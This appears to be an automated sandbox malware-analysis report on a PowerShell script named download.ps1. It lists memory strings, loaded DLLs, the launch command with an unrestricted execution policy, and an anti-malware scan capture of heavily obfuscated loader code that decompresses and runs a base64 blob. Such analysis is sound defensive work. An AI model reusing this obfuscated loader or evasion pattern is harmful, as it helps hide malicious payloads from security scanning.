Source: powershell.exe, 00000000.00000002.1757938142.0000022F24113000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F23F6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1787542760.0000022F32A8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
Source: powershell.exe, 00000000.00000002.1757938142.0000022F24113000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.comX
Source: powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?tab=w1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B896F460_2_00007FFD9B896F46
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B897CF20_2_00007FFD9B897CF2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B896A490_2_00007FFD9B896A49
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B890FF20_2_00007FFD9B890FF2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BAF3D6D0_2_00007FFD9BAF3D6D
Source: powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w
Source: powershell.exe, 00000000.00000002.1787542760.0000022F3296E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F23F1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1787542760.0000022F32A00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1787542760.0000022F32791000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F23F6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1787542760.0000022F32A8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: else top.location='/doodles/';};})();</script><input value="AL9hbdgAAAAAZ3pGV6J5npDcmMyd9T3ewsWsQ-wLOq3z" name="iflsig" type="hidden"></span></span></td><td class="fl sblc" align="left" nowrap="" width="25%"><a href="/advanced_search?hl=en&amp;authuser=0">Advanced search</a></td></tr></table><input id="gbv" name="gbv" type="hidden" value="1"><script nonce="id1cOR58uDo3nXmvhgL8Qw">(function(){var a,b="1";if(document&&document.getElementById)if(typeof XMLHttpRequest!="undefined")b="2";else if(typeof ActiveXObject!="undefined"){var c,d,e=["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","Microsoft.XMLHTTP"];for(c=0;d=e[c++];)try{new ActiveXObject(d),b="2"}catch(h){}}a=b;if(a=="2"&&location.search.indexOf("&gbv=2")==-1){var f=google.gbvu,g=document.getElementById("gbv");g&&(g.value=a);f&&window.setTimeout(function(){location.href=f},0)};}).call(this);</script></form><div style="font-size:83%;min-height:3.5em"><br><div id="K7FuCf"><style>.U8K5Lc{font-size:small;margin-bottom:32px}.U8K5Lc a.qDTOof{display:inline-block;text-decoration:none}.U8K5Lc img{border:none;margin-right:5px;vertical-align:middle}</style><div class="U8K5Lc" data-ved="0ahUKEwjCyo_qit6KAxXngP0HHR_3FLQQnIcBCAU"><img alt="" height="32" src="https://www.google.com/images/hpp/YT_RedPlayButton_Icon_48x48.png" width="32"><span>Score one final special offer for </span><a href="https://www.google.com/url?q=https://tv.youtube.com/learn/nflsundayticket/%3Futm_campaign%3Dytnflst_jan25_nflst_w18_hpp_q1_2025%26utm_source%3Dhpp%26utm_medium%3Dgoogle%26utm_content%3Dcpy1&amp;source=hpp&amp;id=19046161&amp;ct=3&amp;usg=AOvVaw0o2kBUsvWMu1ycqjGPCIBX&amp;sa=X&amp;ved=0ahUKEwjCyo_qit6KAxXngP0HHR_3FLQQ8IcBCAY" rel="nofollow">NFL Sunday Ticket</a></div></div></div><span id="footer"><div style="font-size:10pt"><div style="margin:19px auto;text-align:center" id="WqQANb"><a href="/intl/en/ads/">Advertising</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a></div></div><p style="font-size:8pt;color:#70757a">&copy; 2025 - <a href="/intl/en/policies/privacy/">Privacy</a> - <a href="/intl/en/policies/terms/">Terms</a></p></span></center><script nonce="id1cOR58uDo3nXmvhgL8Qw">(function(){window.google.cdo={height:757,width:1440};(function(){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="id1cOR58uDo3nXmvhgL8Qw">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE
Source: powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d'
Source: powershell.exe, 00000000.00000002.1757938142.0000022F24113000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX
Source: powershell.exe, 00000000.00000002.1757938142.0000022F23F00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQ/rs\x3dACT90oE4VDuypTCPH8jtHQgPMB8KgoFScQ',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="id1cOR58uDo3nXmvhgL8Qw">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4wX
Source: powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w'
Source: powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basejs:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qAX
Source: powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: u=/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,dX
Source: powershell.exe, 00000000.00000002.1757938142.0000022F23F6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="id1cOR58uDo3nXmvhgL8Qw">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQ/rs\x3dACT90oE4VDuypTCPH8jtHQgPMB8KgoFScQ',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="id1cOR58uDo3nXmvhgL8Qw">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: classification engineClassification label: mal76.evad.winPS1@2/7@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7364:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1uyuariw.c0n.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $ck2adi1pghjb3f6.(([system.String]::new(@((5343-5276),(9141-9030),(2873-2761),(-2085+2206),(3856-3772),(7026-6915)))))( $udb20fetjp1zwy8 ) $ck2adi1pghjb3f6.(([char[]]@((661826/(176+9702)),(3557-(3097202/(8399-(11828-4327)))),(-8743+(17018-8164)),(570055/(7048854/(7576-(7077-(6141-5218))))),(467024/(-4253+8877))) -join ''))()$iyuv4ca1ntgfldh.(([system.String]::new(@((584642/8726),(447012/4139),(6162-6051),(-542+657),(4531-(7143-(-1321+4034)))))))()[byte[]] $vmw0ps1o7e48l3y = $udb20fetjp1zwy8.(([system.String]::new(@((-10151+10235),(9389-9278),(426595/6563),(-2245+2359),(662340/5810),(-1418+(-6002+7517)),(3397-(12370176/3776))))))() $jaio2xqm68bpcs0=$vmw0ps1o7e48l3y return $jaio2xqm68bpcs0}[System.Text.Encoding]::ascii.(([char[]]@((542440/(64917080/(-820+9317))),(1025453/(15042-4889)),(4199-(13511-(11002476/(362+(4149775/(11229-6074)))))),(-3313+3396),(8152-8036),(7179-(5344+(4517625/(-2541+(8022798/(6692-(41014359/(37829940/4740)))))))),(-347+(-8022+(60436568/(2339296/(9216-(15753-6865)))))),(798050/7255),(-7332+(54758775/7365))) -join ''))((c3x1w6bn4ogvlz58qr0spy7tide "bPI+OTJ0eHVnaJz7KvYqbkDx5zgjl5BHxx6cpXiSpWJy7DzrTgfENVJJgDRz5FfUO0+BH6m5Pa4cn0aFFYx0qBBNblzqtd3LvwLVf65MX1cxN+yduQcpBE4ODpqbgYYoLZUpBooDgqaaofIgBPbA1sRT11otp6/470SJ4Y3PwAaXgtS0juIxBg/Kw4islfSbLFbIS8SYvZ7olcgQZL4hlm2ZFhpcHJK8qIDH4NuHtYO83uozCeWBGPYoGz2o3hSALne9lhOZDs4M3kIszTTt11nvzwbuzX+bLlXl74Ui3qcotdyLOeZl3qAiKunfGwTq/ELZgISylBJNoai8Vy41jj5Kv530jGs7HEgxF642EPsMGlsbxp0io0zgGrgwIu2RaNT1nlvvBJ1N7Y0LzvK7wv1Nj1yksvaKcc7Ycjrq1xYpCb+bob5Nlk7InZFEvtGLoqQgI2Cc9R70BbnKmIKqjZiB9gYK/Y7Ka9jAZdQZVlCtwQmcipeh9G27toqAkNW2j45NtsVTb+78X+74T0MIxtOcB0LchgnpnCbLwdgWh5mVHyaA1LYpx8KZz7qUB0RrwJ4v6gTyUF7a9kzQHqwqnuofIFiPVH6kxTCNsRPQQQ98kIthqsxypHmF4E+kOOeUANh69PXWF8UU91OVro/kotEcciID0qmUx7SbPaRmbvuhDQayJbLXQW+5ZCioxjUZLQLU4uA+qfcImULOXtXhn/oCqrcioMVZlkNZwFSeTXtIjtFBX57aFbnfIjOEIE0rrhcuSIWkAq7uN2Z5yKDgLWkBYLLUclfxbA15B9znI//Q5UOsRZ7oXCk4IW60pwADr1dzLkmYGRxKH2oKtrMIFOo107C+Kx4LQ/xiCrzkMgfefc1P1KwkHP1JsV5gnlDeRu36aiT4H25vzSciYNiihPfht1uT457dsLe32asmtN7eMsfpM0rRNevzsB84i/OJ+fxnFTtDJsNST12izcRYrECfwp7RpSSAlgqxIpTyM+NG/SBJd9B4o+dNTs6TCY58nanGluaBpLd1UgaCen2Ph9Dow95NRQTch2DYhMmert7UzyZA/M9xLtXbj87814uSPEZpe+YSpsq/sD4ZroVKzdYAh4OfjO+++JDYX4n5yYLxGpjtCsd+O5JgDv5Ba/3/IApYDl/FTOtiHBn/FlB68PNzJFAZxWF3IASrAE3Tl5oPhqyI/Obq4M6O+cBfUE+dmXq9+G+1u/Hq6a7hUJ1mHnylk4MjJBxjar73AwpnL/RDEYuFF6tMyCR18YuokXWa3umYQrdhiK+7uitOzM4KQmaQoEcSqI9tWInrBRv2eD4LsV+lrgrefQw6qw1lWaum3+GtAPEbj6JTeTZ9OVVF/qxPOUyURP9KkxqJgB6KQU8akdOKPLbopQ9MBY2ZluzKluPJQETOQrSFqwihT5rNJkx0pU/ru8O1KdY18G9wscjfRuaNlXUoEZzwFP9bh3r5KTTrmx+BLKyU9KxX7JQB6baU9yQTvCUY3oIqs3DIQEryu8PtaDtw2GaC/dWFXBqARZnoPoDgj3Mk5l6TU+7Qb6mxPpvy7YT2SDnzoMYXwXa0mGJn8IGQrvq5U2zAjR0vAZ2EpThlnpcrKYBiTkdPReaEHkbDhP4YraSGqDVrQpxtYEXevOWeFJHwmvXWZK996+pSHnAwYKL+i2hsbEvVgC41wesONYhh1Iwi7rZ3+NH6ejUX8vKcuKVTnnUduCDgtSYs+bT/ygPRHMds4i7hjWXhUh6qMWqV5nqe5atXCQOAcTlGZ2IQ3350vWMWCpAcfaOPi5QXSiygGRJujuMvl1EPXCVjwGnl7a0yyRLYzit5AD/Z9NPrK1eqN
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: download.ps1Virustotal: Detection: 15%
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbF source: powershell.exe, 00000000.00000002.1797817107.0000022F3B098000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1797817107.0000022F3B109000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbps1 source: powershell.exe, 00000000.00000002.1797817107.0000022F3B098000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.1798952484.0000022F3B141000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1798862238.0000022F3B130000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.1796663905.0000022F3AFFA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1797817107.0000022F3B098000.00000004.00000020.00020000.00000000.sdmp
